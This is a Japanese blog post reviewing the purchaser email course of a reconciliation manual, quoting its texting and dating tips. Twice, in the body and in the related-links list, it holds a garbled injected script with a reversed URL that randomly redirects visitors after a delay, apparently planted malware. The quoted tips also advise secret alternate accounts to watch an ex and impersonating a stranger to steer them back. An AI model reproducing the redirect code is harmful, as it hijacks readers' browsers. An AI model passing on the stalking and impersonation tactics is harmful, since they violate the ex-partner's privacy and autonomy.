【復縁マニュアル7step】復縁成功を加速するメール講座テクニック

この記事は6分で読めます

小澤さんの復縁マニュアル【7step】を実際に買ってみた。

 

このページでは、自力復縁に成功した、当サイトの管理人、”復縁ドック”が、

実際に小澤さんの復縁マニュアル【7step】を購入し、7step購入者特典である、

“復縁成功を加速するメール講座”がどんなものかを公開しています。

v(。・ω・。)ィェィ♪

 

復縁ドッグって誰って方は1年2か月に渡る復縁体験談をご覧ください→

メール講座よりマニュアルレビューを見たい方はこちら→

では、早速、復縁成功を加速するメール講座を見てみましょう。

 

 

 

こちらが実際に送られてきたメール講座です。↓

x01

 

7stepの購入から、早3ヶ月が経ちましたが、

いまだに、メール講座は送られてきています。

 

こういった、復縁に役に立つ内容のメールが、

購入後から、もう何十通も送られてきているのです。

マヂウレ━━(*´∀`*b)━━シィ!!!!

 

 

ちなみに、小澤さんのマニュアル【7step】の他に、

浅海さんマニュアル【元カノと復縁する方法】と、

石川さんのマニュアル【復縁ガイドブック】も購入しました。

 

浅海さんのメール講座は、とっくに終了していますし、

たまに送られてくるのは、プチ会員への勧誘メールだけです。

【浅海】復縁プチ会員への勧誘の実態

 

復縁ガイドブックに関しては、メール講座自体がありません。

・゜゜・(/□\*)・゜゜・わ~ん

 

 

 

とまあ、前置きはこのくらいにして、

小澤さんから送られてきた、数十通のメールの中から、

メールテクニックについての講座を公開していきます。

 

すべて書くことはできませんので、いくつかピックアップして、

内容を公開していきますね。

ヾ(・∀・`o)ネェネェ

 

 

こちらが、メールテクニックが書かれているメール講座です。↓

x02

x03

 

 

 

小澤さんに怒られるか、心配でしたが、

勇気を振り絞って、かなりの量を掲載しました。

(`・ω・´) シャキーン

 

 

内容は以下の通りです。↓

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 1px dotted #460e44; background-color: #e7e7eb;”>

==========

メールからデートのアポイントをとる方法

==========

 

メールのやりとりが進んでくると、「会う」約束をとりつける

ステップに入ってくると思います。

 

そこで、どういうメールのやりとりを入れれば

誘えるのか?ということの方法の1つを紹介します。

 

 

ダメな例は、「○月○日○○に行かない?」というメール。

これですと、予定が入っていればそこで終わりです。

 

その後、デートのやりとりを繰り返してしまうと相手は

「面倒くさいな」と感情が変化してきます。

 

会う約束をするのに、相手に「面倒くさい」と

思われては、台無しです。

 

 

この場合のポイントは、相手に考えさせるメールを送ることです。

 

例えば、「今日でも明日でも、今月、来月いつでも良いんだけど

一緒に○○に行けたらいいな!」とすれば

「いつなら行けるかな?」と考えます。

 

ただ、これはあくまでも一例ですので、相手によってメールの仕方は

変えることが大切です。

相手のタイプによっては、先ほどのダメな例が誘いやすいメールにも

なります。

 

 

 

==========

メールのやりとりで、相手のテンションが上がったことを見極める方法。

==========

 

この見極め方法は、あくまでもメールのやりとりの中での話です。

 

メール1通目には適用されませんので注意してください。

 

 

見極めポイントは、メールの返信が早くなり

絵文字が増えてきたかどうかです。

 

また、冗談が多くなってくれば、相手の心に余裕が出てきた証拠です。

 

 

 

==========

「おはよう」「おやすみ」といった挨拶メールは必要かどうか

==========

 

はっきり言いまして、これは自己満足でしかありません。

 

自分より相手の身になって考え必要か考えてみましょう。

 

とくに相手に現在お付き合いしている人がいれば

嫌がらせにしか取れず、余計に離れてしまう結果となってしまいます。

 

相手が挨拶メールを必要としているのであれば

毎日しても構いませんが、たまにしない日を作り

「なんで来ないんだろう」と思わせ揺さぶりをかけるのも有効です。

 

 

 

==========

謝罪のメールの効果的な書き方

==========

 

「謝罪すれば復縁できる」というのは誤りです。

 

謝罪のタイミングを見計らわないと、闇雲に謝れば

復縁できるということはありません。

 

 

謝る場合の方法の1つにLEAD法があります。

 

1.LISTEN:相手の話を良く聞き、この状況を把握する。

 

2.EXPLORE:問題点を探る。

 

3.ANALYZE:その問題点の対処法を検討する。

 

4.DO:今出来る事を直ぐに対応する。

 

この4つの頭文字をとったものがLEAD法です。

問題点をこれに当てはめて考えてください。

 

このLEAD法は、もともとは経営学でのものでしたが

恋愛での現場で実証実験を行い、効果が確認できましたので

ご紹介しました。

 

安心して使って大丈夫です。

 

 

==========

デート後の感謝メールの書き方

==========

 

長文で全てを語ろうとせずに

余韻を残すメールにすることが大切です。

 

始めは、「今日はありがとう」「すごく楽しかった」など。

 

最後の締めには「今度いつ逢える?」ではなく

「今度はもっと○○な格好で行くね!」

など、相手が「何、何?」と期待

想像させて、次回会う事を楽しみにさせるメールが良いです。

 

 

 

==========

デートのアポイントメール2

==========

 

デートに誘う際には自分だけ盛り上がってはいけません。

必ずやり取りの中で相手の言葉を注意深く

観察して相手に合わせるようにしてください。

 

デートにOKをもらえたら

最後は想像、連想させる一言で締めると

相手はデートが楽しみになります。

 

例えば、

「デートの日、チョットしたプレゼントがあるんだ!お楽しみに!」

「久しぶりだけど、変わった私をみてね!」などです。

 

 

 

==========

メールでやってはいけないこと

==========

 

「あれ?小澤さん、確かこれ、始めの方で見たような・・・」

 

はい。1番でも同じようなことを書きました。

しかし、あまりにもやってはいけないことをしている人が

見られるので、あなたには失敗してほしくありませんので、

1番とは別のやってはいけないことをお伝えします。

 

 

メールは直接話すのとは違い

自分の感情が正直に出やすい特徴があります。

 

また、同じ事を言っても表現次第で伝わり方が違います。

 

例えば

「今日何時?」

「今日何時ヽ(~~~ )ノ ハテ?」

でも受け取る側では次の返信内容が変わって

きますので注意しなければいけません。

 

 

 

==========

ミクシー上での関わり方(日記へのコメントや足跡等)

==========

 

この方法は、危険です。

最終手段として残す分は構いませんが、最終でもない段階から

使わないようにしてください。

 

ミスをした場合、致命傷になります。

あくまでも最終兵器と考えましょう。

 

違うアカウントでアクセスし相手の状況など

情報を確認する方法があります。

 

話相手になりきり復縁を勧めるのも復縁屋が行う方法の1つです。

最終兵器として使う分には良い方法だと思います。

 

絶対に始めから使ったり、中途半端なタイミングで

使わないようにしてくださいね。

 

 

 

==========

ブログでの関わり方

==========

 

ミクシ―同様、情報を取る手段と考えた方が良いです。

第三者になりきり上手く復縁に誘導させる事も出来ますので

慎重に扱いましょう。

 

相手に悟られないように相手と同性に成りすます事をお勧めします。

ただ、これもmixi同様に最終手段になりますので、無闇に使用しないで

ください。

 

 

どうでしたか?

かなり、読み応えがあったのではないでしょうか?

 

ちなみに、ここに掲載したメールテクニックは、

全体の5分の2の量です。

ヾ(゚Д゚ )チョット、オクサン!

( ゚д゚)ンマッ!

実際は、この2倍以上のテクニックが紹介されていました。

 

 

 

このメール講座は、一体いつまで続くのか、検討もつきませんが、

7stepのメール講座は、誠実に、購入者さんのためだけを思って作られた、

純粋なメール講座だと思いました。

((d(・ω・`)グッジョーブ!

 

 

これは、あくまで一個人の感想ですので、

あしからず・・・。

[´・ω・`]ゴメンナスッテー

 

 

 

また、面白いメール講座がありましたら、

サイトにアップしていきますね。

では、復縁に向けて頑張っていきましょう!!

復縁ドッグ

 

この記事を読んでいる人は以下のカテゴリー記事も読んでいます。

1年2カ月復縁ドッグ復縁体験談
復縁まで13日間!復縁体験談
復縁結婚カップル対談
復縁活動中の方からの疑問を解決
おすすめ復縁マニュアル

  • このエントリーをはてなブックマークに追加

関連記事

  1. infodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}topで【小澤7step】復縁マニュアルを実際に購入してみた

コメント

    • じゅん

    元カノと遠距離になってしまってもデートのアポは取れるでしょうか。断られてしまったら次会える日がいつ来るか分からないのでとても不安になります。

      • 復縁ドッグ

      これだけだと何とも言えませんね…。
      でも、不安はみんなありますし、失敗から学ぶことの方が多いですからね。
      これが正解なんて、その状況、タイミングで答えは変わってしまうんです。
      だからこそ、恋愛レベルを上げていく必要があるとサイトでも書いているんですよ。
      じゅんさんの成長と、彼女さんとの関係、タイミングなどすべてを考慮して
      答えを出すしかありません。
      それをできる様になるのが、1つの目標でもあるのではないでしょうか?

        • じゅん

        なるほど…最近は彼女と付き合っていたときに関するリストを作成し始めました。まだ途中ですが…。中身は別れの原因になったこと、付き合っているときにやらない方が良かったこと、付き合っているときにもっとこうするべきだったこと、くらいしか書いてません。これからまだまだ書き足すつもりです。今は準備期間に入って1ヶ月と半分くらいです。2ヶ月くらい経ってからこちらの近況を教えるのと、彼女の励みになるような言葉をlineで送れたらと思っています。それと同時に彼女の相談役になれるように少しアプローチしてみたいと思っているのですが大丈夫ですかね?

  1. この記事へのトラックバックはありません。

管理人:復縁ドッグ


恋愛レベルの向上なしに復縁はできない!

恋愛レベルの向上なしに夫婦の絆は作れない!

をモットーに、当サイトは運営されています。


1年2ヵ月の歳月を費やし、

自力で復縁に成功した復縁ドッグは

現在、復縁した彼女と結婚し

幸せな家庭を築いています。



→復縁ドッグによる前10回復縁メール講座



→復縁ドッグの10年以上に渡る復縁日記



→復縁に欠かせない基礎知識


youtube動画一覧

復縁オンライン講座